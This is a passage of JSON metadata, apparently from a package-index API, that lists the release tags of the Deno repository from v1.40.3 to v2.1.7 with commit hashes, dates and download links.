mmit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1